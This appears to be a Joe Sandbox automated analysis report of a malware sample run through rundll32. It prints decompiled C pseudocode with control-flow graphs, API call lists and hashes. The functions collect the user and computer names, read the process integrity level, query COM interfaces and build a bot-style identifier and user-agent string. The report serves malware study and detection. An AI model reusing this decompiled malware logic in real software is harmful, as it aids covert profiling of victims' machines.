                                          control_flow_graph 139 4bf93d5-4bf93e9 140 4bf93eb-4bf93f0 139->140 141 4bf93f3-4bf9405 call 4bf6f89 139->141 140->141 144 4bf9459-4bf9466 141->144 145 4bf9407-4bf9417 GetUserNameW 141->145 147 4bf9468-4bf947f GetComputerNameW 144->147 146 4bf9419-4bf9429 RtlAllocateHeap 145->146 145->147 146->147 148 4bf942b-4bf9438 GetUserNameW 146->148 149 4bf94bd-4bf94e1 147->149 150 4bf9481-4bf9492 RtlAllocateHeap 147->150 151 4bf943a-4bf9446 call 4bf7cf7 148->151 152 4bf9448-4bf9457 HeapFree 148->152 150->149 153 4bf9494-4bf949d GetComputerNameW 150->153 151->152 152->147 155 4bf949f-4bf94ab call 4bf7cf7 153->155 156 4bf94ae-4bf94b7 HeapFree 153->156 155->156 156->149
                                          C-Code - Quality: 96%
                                          			E04BF93D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x4bfd270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E04BF6F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x4bfd2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x4bfd238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E04BF7CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x4bfd238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x4bfd238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04BF7CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x4bfd238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}




















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04BF940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BF9423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04BF9430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF9451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BF9478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BF948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BF9499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF94B7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 2d6888b17ab681528d425253eec64bfd7da145660d3296f0b05a3672ecd72050
                                          • Instruction ID: 8174f135c2633aef4f9918af43e2628702a3ec6632f4d996a331c78c4b408aba
                                          • Opcode Fuzzy Hash: 2d6888b17ab681528d425253eec64bfd7da145660d3296f0b05a3672ecd72050
                                          • Instruction Fuzzy Hash: 0631F8B1A00209EFDB20DFB9DC80AAEFBF9FB54204B5144AAE509D7210D734EE459B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E04BF53E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x4bfd25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E04BF58BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E04BF147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}










                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04BF5415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04BF5435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04BF5445
                                          • CloseHandle.KERNEL32(00000000), ref: 04BF5495
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04BF5468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04BF5470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04BF5480
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 429eb3f5fa92f3051ea94fe14e3a589e8d8e007fc5327be3a8398ab61a40e469
                                          • Instruction ID: e69e0b9d001cb8ee4c694e8e0b7da839650a43031b091f9f49398222699b507e
                                          • Opcode Fuzzy Hash: 429eb3f5fa92f3051ea94fe14e3a589e8d8e007fc5327be3a8398ab61a40e469
                                          • Instruction Fuzzy Hash: 78213975900218FFEB109FA4DC84EAEBBBDEB48304F0040A6EA15A7251C7759E45EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 4bfa060-4bfa0a6 SysAllocString 187 4bfa0ac-4bfa0d9 186->187 188 4bfa1ca-4bfa1ce 186->188 194 4bfa0df-4bfa0eb call 4bfa872 187->194 195 4bfa1c8 187->195 189 4bfa1d9-4bfa1dd 188->189 190 4bfa1d0-4bfa1d3 SafeArrayDestroy 188->190 192 4bfa1df-4bfa1e2 SysFreeString 189->192 193 4bfa1e8-4bfa1ee 189->193 190->189 192->193 194->195 198 4bfa0f1-4bfa101 194->198 195->188 198->195 200 4bfa107-4bfa12d IUnknown_QueryInterface_Proxy 198->200 200->195 202 4bfa133-4bfa147 200->202 204 4bfa149-4bfa14d 202->204 205 4bfa186-4bfa18b 202->205 204->205 208 4bfa14f-4bfa166 StrStrIW 204->208 206 4bfa1bf-4bfa1c4 205->206 207 4bfa18d-4bfa192 205->207 206->195 207->206 211 4bfa194-4bfa19f call 4bf1295 207->211 209 4bfa17d-4bfa180 SysFreeString 208->209 210 4bfa168-4bfa171 call 4bf91b5 208->210 209->205 210->209 216 4bfa173-4bfa17b call 4bfa872 210->216 215 4bfa1a4-4bfa1a8 211->215 215->206 217 4bfa1aa-4bfa1af 215->217 216->209 219 4bfa1ba 217->219 220 4bfa1b1-4bfa1b8 217->220 219->206 220->206
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 04BFA09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04BFA11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04BFA15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BFA180
                                            • Part of subcall function 04BF91B5: SysAllocString.OLEAUT32(04BFC298), ref: 04BF9205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04BFA1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BFA1E2
                                            • Part of subcall function 04BFA872: Sleep.KERNEL32(000001F4), ref: 04BFA8BA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 28c6f4e2d2ba46d8935f751c2bd2d4b9411e6edcd183dd4b447a64ac2d17ccda
                                          • Instruction ID: 40b23e5dd7d4bf120dfd910a06c106e1935c593ee42263a84d46792683ff8cc7
                                          • Opcode Fuzzy Hash: 28c6f4e2d2ba46d8935f751c2bd2d4b9411e6edcd183dd4b447a64ac2d17ccda
                                          • Instruction Fuzzy Hash: 4D518035500609AFDB05CFA8DC44A9EB7B6FF89740B158469EA0DDB210EB30FE19CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 4bf7c75-4bf7c88 223 4bf7c8f-4bf7c93 StrChrA 222->223 224 4bf7c8a-4bf7c8e 223->224 225 4bf7c95-4bf7ca6 call 4bf58be 223->225 224->223 228 4bf7ceb 225->228 229 4bf7ca8-4bf7cb4 StrTrimA 225->229 230 4bf7ced-4bf7cf4 228->230 231 4bf7cb6-4bf7cbf StrChrA 229->231 232 4bf7cd1-4bf7cdd 231->232 233 4bf7cc1-4bf7ccb StrTrimA 231->233 232->231 234 4bf7cdf-4bf7ce9 232->234 233->232 234->230
                                          C-Code - Quality: 54%
                                          			E04BF7C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E04BF58BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x4bfc28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x4bfc28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}











                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,070D95AC,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?), ref: 04BF7C8F
                                          • StrTrimA.KERNELBASE(?,04BFC28C,00000002,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?,4D283A53), ref: 04BF7CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?,4D283A53,?), ref: 04BF7CB9
                                          • StrTrimA.SHLWAPI(00000001,04BFC28C,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?,4D283A53,?), ref: 04BF7CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 4baa4bb0ffde0f4c81d55d309a3729422caad35a58553a92cdd2ced6c18cf37b
                                          • Instruction ID: 5e4d4f01d91f4082c947b418dde3a42d03de9447297af5294f53c29ee513cbf5
                                          • Opcode Fuzzy Hash: 4baa4bb0ffde0f4c81d55d309a3729422caad35a58553a92cdd2ced6c18cf37b
                                          • Instruction Fuzzy Hash: 0501D8716053166FD2219E698C48F3BBF9CFB45A50F1105D9FA89C7240EF70E81586F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 4bf4908-4bf4922 call 4bf11af 238 4bf4938-4bf4946 235->238 239 4bf4924-4bf4932 235->239 241 4bf4958-4bf4973 call 4bf1111 238->241 242 4bf4948-4bf494b 238->242 239->238 248 4bf497d 241->248 249 4bf4975-4bf497b 241->249 242->241 243 4bf494d-4bf4952 242->243 243->241 245 4bf4adb 243->245 247 4bf4add-4bf4ae2 245->247 250 4bf4983-4bf4998 call 4bf1ec4 call 4bf1a4e 248->250 249->250 255 4bf499a-4bf499d CloseHandle 250->255 256 4bf49a3-4bf49a9 250->256 255->256 257 4bf49cf-4bf49e7 call 4bf58be 256->257 258 4bf49ab-4bf49b0 256->258 267 4bf49e9-4bf4a11 memset RtlInitializeCriticalSection 257->267 268 4bf4a13-4bf4a15 257->268 259 4bf4ac6-4bf4acb 258->259 260 4bf49b6 258->260 262 4bf4acd-4bf4ad1 259->262 263 4bf4ad3-4bf4ad9 259->263 264 4bf49b9-4bf49c8 call 4bf7827 260->264 262->247 262->263 263->247 272 4bf49ca 264->272 271 4bf4a16-4bf4a1a 267->271 268->271 271->259 273 4bf4a20-4bf4a36 RtlAllocateHeap 271->273 272->259 274 4bf4a38-4bf4a64 wsprintfA 273->274 275 4bf4a66-4bf4a68 273->275 276 4bf4a69-4bf4a6d 274->276 275->276 276->259 277 4bf4a6f-4bf4a8f call 4bf93d5 call 4bf98f7 276->277 277->259 282 4bf4a91-4bf4a98 call 4bf205b 277->282 285 4bf4a9f-4bf4aa6 282->285 286 4bf4a9a-4bf4a9d 282->286 287 4bf4abb-4bf4abf call 4bf9b6f 285->287 288 4bf4aa8-4bf4aaa 285->288 286->259 291 4bf4ac4 287->291 288->259 290 4bf4aac-4bf4ab0 call 4bf6cd3 288->290 293 4bf4ab5-4bf4ab9 290->293 291->259 293->259 293->287
                                          C-Code - Quality: 57%
                                          			E04BF4908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E04BF11AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x4bfd25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x4bfd25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x4bfd164(0, 2);
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E04BF1111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x4bfd2a4; // 0x24da5a8
                                          					if( *0x4bfd25c > 5) {
                                          						_t8 = _t26 + 0x4bfe5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x4bfea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E04BF1EC4(_t27, _t27);
                                          					_t31 = E04BF1A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x4bfd270 =  *0x4bfd270 ^ 0x81bbe65d;
                                          						_t32 = E04BF58BE(0x60);
                                          						 *0x4bfd324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x4bfd324; // 0x70d95b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x4bfd324; // 0x70d95b0
                                          							 *_t51 = 0x4bfe845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x4bfd238, 0, 0x43);
                                          							 *0x4bfd2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x4bfd25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x4bfd2a4; // 0x24da5a8
                                          								_t13 = _t58 + 0x4bfe55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4bfc28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E04BF93D5( ~_v8 &  *0x4bfd270, 0x4bfd00c); // executed
                                          								_t42 = E04BF98F7(0, _t55, _t63, 0x4bfd00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E04BF205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E04BF9B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E04BF6CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x4bfd160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E04BF7827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 04BF11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04BF4920,00000001), ref: 04BF11BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04BF499D
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • memset.NTDLL ref: 04BF49ED
                                          • RtlInitializeCriticalSection.NTDLL(070D9570), ref: 04BF49FE
                                            • Part of subcall function 04BF6CD3: memset.NTDLL ref: 04BF6CED
                                            • Part of subcall function 04BF6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04BF6D24
                                            • Part of subcall function 04BF6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BF4AB5), ref: 04BF6D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04BF4A29
                                          • wsprintfA.USER32 ref: 04BF4A59
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 4c808f09f164d1617d77a38e96b3b7677b27d1c3ee45fcc8cc8b4a1491914e9f
                                          • Instruction ID: 54667ba822afae00a15c4e1e1329c0d3942c83972435d82c5610b75dcbd5971c
                                          • Opcode Fuzzy Hash: 4c808f09f164d1617d77a38e96b3b7677b27d1c3ee45fcc8cc8b4a1491914e9f
                                          • Instruction Fuzzy Hash: 2B517371B00219AFEB21EBB4DC44B6F77ACEB14704F144596E70ED7240E674F9498BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04BF6CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t5 = _t40 + 0x4bfee24; // 0x410025
                                          				_t90 = E04BF4814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E04BF147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E04BF9138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E04BFA5E9(0,  *0x4bfd33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t11 = _t52 + 0x4bfe81a; // 0x65696c43
                                          					_t55 = E04BFA5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E04BF74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E04BF147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E04BF147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E04BF568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x4bfd260 & 0x00000001) == 0) {
                                          							L14:
                                          							E04BF6E92(_t81, _v60, _v56,  *0x4bfd270, 0);
                                          							_t81 = E04BF6737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E04BF72F2( &_v84, 0);
                                          							}
                                          							E04BF147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t18 = _t67 + 0x4bfe823; // 0x65696c43
                                          						_t70 = E04BFA5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E04BF74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E04BF147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 04BF6CED
                                            • Part of subcall function 04BF4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04BF6D15,00410025,00000005,?,00000000), ref: 04BF4825
                                            • Part of subcall function 04BF4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04BF4842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04BF6D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BF4AB5), ref: 04BF6D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 46a8eaa21752c6003068b295751851f6abfa8f7b2715fa5ad690a9b69a7abcf9
                                          • Instruction ID: b798cb5657bf649cf9cd4f6464ca42efd2ca01cc013f80519f122342135b5b45
                                          • Opcode Fuzzy Hash: 46a8eaa21752c6003068b295751851f6abfa8f7b2715fa5ad690a9b69a7abcf9
